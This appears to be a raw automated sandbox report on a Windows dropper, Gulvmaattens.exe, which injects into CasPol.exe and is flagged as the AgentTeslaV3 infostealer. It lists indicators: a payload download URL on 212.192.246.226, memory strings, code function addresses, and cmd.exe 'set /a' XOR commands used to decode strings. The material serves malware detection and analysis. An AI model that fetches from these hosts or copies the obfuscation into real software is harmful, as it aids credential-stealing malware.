          Source: CasPol.exe, 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 0000008F.00000002.55914326721.0000000000F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.192.246.226/jLIEsqMZom33.asdL
          Source: CasPol.exe, 0000008F.00000002.55914326721.0000000000F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.192.246.226/jLIEsqMZom33.asdm
          Source: CasPol.exe, 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
          Source: CasPol.exe, 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://NwSpLV.com
          Source: Gulvmaattens.exeString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
          Source: Gulvmaattens.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
          Source: Gulvmaattens.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
          Source: Gulvmaattens.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: Gulvmaattens.exeString found in binary or memory: http://repository.certum.pl/ctnca.cer09
          Source: Gulvmaattens.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
          Source: Gulvmaattens.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
          Source: Gulvmaattens.exeString found in binary or memory: http://subca.ocsp-certum.com01
          Source: Gulvmaattens.exeString found in binary or memory: http://subca.ocsp-certum.com02
          Source: Gulvmaattens.exeString found in binary or memory: http://subca.ocsp-certum.com05
          Source: Gulvmaattens.exeString found in binary or memory: http://www.certum.pl/CPS0
          Source: CasPol.exe, 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
          Source: global trafficHTTP traffic detected: GET /jLIEsqMZom33.asd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 212.192.246.226Cache-Control: no-cache
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_004055B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: Conhost.exeProcess created: 106

          System Summary

          barindex
          Source: 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: Process Memory Space: CasPol.exe PID: 3308, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: Gulvmaattens.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: Process Memory Space: CasPol.exe PID: 3308, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_00407458
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_00406C81
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_71401B5F
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AB2B88
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA57F1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AB4B18
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AB3510
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1AA2
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA12BA
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0EBF
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0285
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0A9A
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA069A
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA7E9F
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA12F8
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0EF4
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0ACE
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA06DD
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1ADD
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA02D1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1A2A
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0A29
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA862E
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA2E21
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0238
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0E36
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1209
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0202
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0A1D
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0612
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1A6A
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0A6E
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA7E7B
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1275
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA065D
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1257
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA17A4
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1BB9
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA03B6
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0BB4
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0B89
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1B85
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0795
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0F95
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0FEF
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA07E3
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA03FA
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AB43FB
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA6FF7
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0BF7
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1BF4
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA17D0
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0F20
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0B0E
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA071A
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1B11
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1766
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0B48
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1348
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0349
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA074E
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1B42
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1759
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0F56
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0CBF
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA088E
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0080
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA109A
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AB38C3
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA04C5
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA18D8
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA08D1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA10D6
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA842A
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AB582E
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0C39
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA043E
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AAC832
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1C33
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA100E
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA180F
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0005
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA8405
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0018
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA5815
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0C6F
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0060
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1858
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0853
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1056
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA2857
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA4DA9
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA01BA
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA09BB
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA19BB
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AB41BA
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0182
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0983
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1983
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA8587
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0592
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA09ED
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA19F4
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0DF5
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0DCA
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AABDD1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0D39
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0908
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0103
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA111B
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1917
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA7917
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0979
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0D7D
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA5973
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0548
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1946
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA0144
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AA1155
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E1B025
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E18960
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E1DED0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E183E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E1A0D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E14928
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E11BD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E13348
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E2D8F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E255E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E24168
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E2C510
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E296F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E26790
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E225E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E2317B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_00E237B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_01111108
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_0111DB68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_01117978
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_1CFD5D08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_1CFD4374
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_1CFD5CC1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_1CFD69F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_1F2BBE70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_1F2B4320
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_1F2BB110
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_1F2B3708
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 143_2_1F2B3A50
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AB4B18 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_02AB7C43 NtMapViewOfSection,
          Source: Gulvmaattens.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Gulvmaattens.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\Gulvmaattens.exeSection loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
          Source: Gulvmaattens.exeStatic PE information: invalid certificate
          Source: vfslog.dll.1.drStatic PE information: Number of sections : 19 > 10
          Source: C:\Users\user\Desktop\Gulvmaattens.exeFile read: C:\Users\user\Desktop\Gulvmaattens.exeJump to behavior
          Source: Gulvmaattens.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Gulvmaattens.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Gulvmaattens.exe "C:\Users\user\Desktop\Gulvmaattens.exe"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x78^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x61^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x7D^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x76^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x7F^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x00^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x01^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x09^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x09^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x70^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x52^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x47^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x75^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5A^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5F^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x56^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x72^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1B^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x5E^51"
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x41^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x07^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x1F^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Gulvmaattens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "0x13^51"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
